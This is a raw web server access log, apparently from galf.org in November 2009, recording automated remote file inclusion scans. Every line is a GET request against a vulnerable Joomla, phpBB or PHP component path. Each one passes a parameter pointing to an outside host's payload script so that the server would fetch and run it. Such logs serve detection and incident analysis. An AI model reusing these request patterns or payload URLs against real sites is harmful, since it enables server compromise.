114.108.177.238 - - [30/Nov/2009:05:15:16 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.130.198.40 - - [30/Nov/2009:05:15:40 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.130.198.40 - - [30/Nov/2009:05:15:40 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.130.198.40 - - [30/Nov/2009:05:15:40 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:15:40 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:15:40 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:15:42 -0800] "GET /logs/access_090615.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:16:33 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:16:33 -0800] "GET /logs/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:16:33 -0800] "GET /homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:05:17:30 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:05:17:30 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:05:17:30 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:17:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:18:01 -0800] "GET /homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:18:01 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:18:01 -0800] "GET /logs/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:18:03 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:18:03 -0800] "GET /logs/access_090713.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:19:21 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:19:21 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:19:21 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [30/Nov/2009:05:19:39 -0800] "GET /logs/access_090525.log/config.php?path_to_root=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [30/Nov/2009:05:19:39 -0800] "GET /logs/config.php?path_to_root=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [30/Nov/2009:05:19:39 -0800] "GET /config.php?path_to_root=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.13.132.199 - - [30/Nov/2009:05:20:10 -0800] "GET /logs/access_090831.log/config.php?path_to_root=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:20:16 -0800] "GET /logs/access_090622.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:20:48 -0800] "GET /logs/access_090622.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:21:14 -0800] "GET /logs/access_090720.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:21:17 -0800] "GET /logs/access_090720.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:21:33 -0800] "GET /logs/access_090817.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:21:33 -0800] "GET /logs/access_090601.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:05:22:05 -0800] "GET /logs/access_091102.log%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:22:19 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:22:49 -0800] "GET /logs/access_090928.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [30/Nov/2009:05:22:53 -0800] "GET /logs/access_090928.log/homepage.php?sel=http://anginbali.com/backend/zx1.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:24:51 -0800] "GET /logs/access_090713.log%20%20/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:24:51 -0800] "GET /modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:24:51 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.162.109.186 - - [30/Nov/2009:05:25:09 -0800] "GET /logs/access_090622.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:25:43 -0800] "GET //skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:25:44 -0800] "GET /logs///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:25:44 -0800] "GET /logs/access_090622.log///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:05:26:20 -0800] "GET /logs/access_090706.log/show_news.php?cutepath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:05:26:20 -0800] "GET /logs/show_news.php?cutepath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:05:26:20 -0800] "GET /show_news.php?cutepath=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:26:44 -0800] "GET /logs/access.log///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:27:28 -0800] "GET /logs/access_090928.log///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:13 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:13 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:18 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:19 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:19 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:28 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:32 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:28:36 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:05:29:11 -0800] "GET /poweredbywpmu//wp-pass.php?_wp_http_referer=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [30/Nov/2009:05:29:11 -0800] "GET /logs/poweredbywpmu//wp-pass.php?_wp_http_referer=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [30/Nov/2009:05:29:11 -0800] "GET /logs/access.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:05:29:44 -0800] "GET /logs/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:29:44 -0800] "GET /logs/access_090629.log%20%20/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:29:44 -0800] "GET /index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:30:02 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:30:02 -0800] "GET /logs/access_090713.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:30:03 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:30:10 -0800] "GET /logs/access_090629.log/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:30:10 -0800] "GET /index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:30:10 -0800] "GET /logs/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:30:18 -0800] "GET /logs/access_090511.log/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:30:26 -0800] "GET /logs/access_090511.log%20%20/index.php?arquivo=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:31:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:31:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:31:34 -0800] "GET /logs/access_090622.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:31:45 -0800] "GET /logs/access_090622.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:31:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:31:46 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:32:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
70.43.33.158 - - [30/Nov/2009:05:33:05 -0800] "GET /logs/access.log//include/write.php?dir=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "galf.org"
70.43.33.158 - - [30/Nov/2009:05:33:06 -0800] "GET /include/write.php?dir=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "galf.org"
70.43.33.158 - - [30/Nov/2009:05:33:06 -0800] "GET /logs//include/write.php?dir=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "galf.org"
164.77.228.204 - - [30/Nov/2009:05:34:39 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:35:04 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:35:07 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:35:11 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:35:11 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:05:35:52 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:05:36:41 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:05:36:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:05:36:41 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
110.45.145.165 - - [30/Nov/2009:05:37:17 -0800] "GET /logs/access_090706.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:25 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:25 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:26 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:26 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:27 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:28 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:28 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:31 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:31 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:38 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:39 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:41 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:44 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:48 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:49 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:49 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:49 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:49 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:50 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:52 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:52 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:54 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:55 -0800] "GET /?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:05:39:55 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
